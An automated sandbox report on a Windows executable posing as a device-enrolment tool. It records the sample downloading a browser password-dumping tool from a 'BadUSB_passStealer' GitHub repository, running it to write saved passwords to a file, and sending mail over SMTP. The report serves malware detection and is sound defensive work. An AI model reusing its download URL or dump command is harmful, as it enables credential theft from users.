Edit tour

Windows Analysis Report
UDO_Device_Enrolment.exe

Overview

General Information

Sample Name:	UDO_Device_Enrolment.exe
Analysis ID:	709523
MD5:	33d42728d32ae2eae31e4e1666b9b41c
SHA1:	8eb8f3dd4394d95cbe0294903f11df25966e483a
SHA256:	125fabbc234e4aef84704adad60213c510611aa5ee1a86fc238d6497df121e21
Tags:	exe
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Machine Learning detection for sample

Yara detected WebBrowserPassView password recovery tool

Machine Learning detection for dropped file

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Contains functionality to detect virtual machines (STR)

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Uses SMTP (mail sending)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

UDO_Device_Enrolment.exe (PID: 588 cmdline: "C:\Users\user\Desktop\UDO_Device_Enrolment.exe" MD5: 33D42728D32AE2EAE31E4E1666B9B41C)

WebBrowserPassView.exe (PID: 3384 cmdline: "C:\temp\Windows32\WebBrowserPassView.exe" /stext HWID.txt MD5: 2024EA60DA870A221DB260482117258B)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\temp\Windows32\WebBrowserPassView.exe	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000001.00000000.267006505.000000000044F000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000001.00000000.266140823.000000000044F000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000001.00000000.267314538.000000000044F000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: WebBrowserPassView.exe PID: 3384	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.WebBrowserPassView.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
1.0.WebBrowserPassView.exe.400000.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
1.0.WebBrowserPassView.exe.400000.2.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
1.0.WebBrowserPassView.exe.400000.3.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
1.0.WebBrowserPassView.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: UDO_Device_Enrolment.exe

ReversingLabs: Detection: 40%

Antivirus / Scanner detection for submitted sample

Source: UDO_Device_Enrolment.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\temp\Windows32\WebBrowserPassView.exe	ReversingLabs: Detection: 80%
Source: C:\temp\Windows32\WebBrowserPassView.exe	Metadefender: Detection: 42%			Perma Link

Machine Learning detection for sample

Source: UDO_Device_Enrolment.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\temp\Windows32\WebBrowserPassView.exe

Joe Sandbox ML: detected

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_00407687 GetProcAddress,FreeLibrary,CryptUnprotectData,CryptUnprotectData,

1_2_00407687

Source: UDO_Device_Enrolment.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49700 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49702 version: TLS 1.0

Source: UDO_Device_Enrolment.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: UDO_Device_Enrolment.exe, 00000000.00000002.336742168.000000001CD26000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: UDO_Device_Enrolment.exe, 00000000.00000002.336155464.000000001AFF6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: UDO_Device_Enrolment.exe, 00000000.00000002.335662738.000000001AF47000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbb source: UDO_Device_Enrolment.exe, 00000000.00000002.336742168.000000001CD26000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: UDO_Device_Enrolment.exe, 00000000.00000002.335580455.000000001AF20000.00000004.00000020.00020000.00000000.sdmp

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_0040B477 FindFirstFileW,FindNextFileW,

1_2_0040B477

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: Joe Sandbox View	IP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox View	IP Address: 140.82.121.4 140.82.121.4

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49700 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49702 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET /tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?raw=true HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.17134.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tuconnaisyouknow/BadUSB_passStealer/raw/main/other_files/WebBrowserPassView.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.17134.1Host: github.comCookie: _gh_sess=MZmDdE9N3n1fZSys9nAuN8sTDFDwG7U0FgKWhMqqNtlWY62yST4FqHZkoMHKheFDseJfzzCkhFXsGv9MtR%2FEIGIFAiPnJ3d8Gvw4p2BD2QrbWXPVxiZInfPE%2BN%2B1djhqNUB1qgzwq9AQj5gkNyGVZNt5rJDCXdx2Vq0A5N6mLxOqEU8Qy%2BY6zN%2FFRRbMpZw19GiUj6Sm9rJxVxQpWXsw7ldIUUYJDjVVJtM5l3s5AvLm05JNAXbCNDyaHWUafjqf%2BoGyrpKbhx%2BJXHGmDHSbVg%3D%3D--WTlSr%2BGITxfRfJ9w--29doTZR60AO2ufhYeUfmfQ%3D%3D; _octo=GH1.1.1468486099.1664130543; logged_in=no
Source: global traffic	HTTP traffic detected: GET /tuconnaisyouknow/BadUSB_passStealer/main/other_files/WebBrowserPassView.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-US) WindowsPowerShell/5.1.17134.1Host: raw.githubusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.3:49705 -> 52.97.188.70:587

Source: global traffic

TCP traffic: 192.168.2.3:49705 -> 52.97.188.70:587

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: WebBrowserPassView.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: WebBrowserPassView.exe, 00000001.00000003.285907388.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tps%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&r
Source: WebBrowserPassView.exe, 00000001.00000003.285907388.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tps%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&r

Source: UDO_Device_Enrolment.exe, 00000000.00000002.336600833.000000001CD02000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: UDO_Device_Enrolment.exe, 00000000.00000002.336600833.000000001CD02000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.335946417.000000001AFAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: UDO_Device_Enrolment.exe, 00000000.00000002.336155464.000000001AFF6000.00000004.00000020.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: UDO_Device_Enrolment.exe, 00000000.00000002.336155464.000000001AFF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: UDO_Device_Enrolment.exe, 00000000.00000002.336600833.000000001CD02000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: UDO_Device_Enrolment.exe, 00000000.00000002.336600833.000000001CD02000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.335946417.000000001AFAB000.00000004.00000020.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
Source: UDO_Device_Enrolment.exe, 00000000.00000002.336600833.000000001CD02000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: UDO_Device_Enrolment.exe, 00000000.00000002.336600833.000000001CD02000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.335946417.000000001AFAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
Source: UDO_Device_Enrolment.exe, 00000000.00000003.255554871.000000001D294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.w
Source: UDO_Device_Enrolment.exe, 00000000.00000003.252756609.000000001D277000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.wikipedia
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: UDO_Device_Enrolment.exe, 00000000.00000002.333655406.0000000002909000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0B
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0E
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0F
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0K
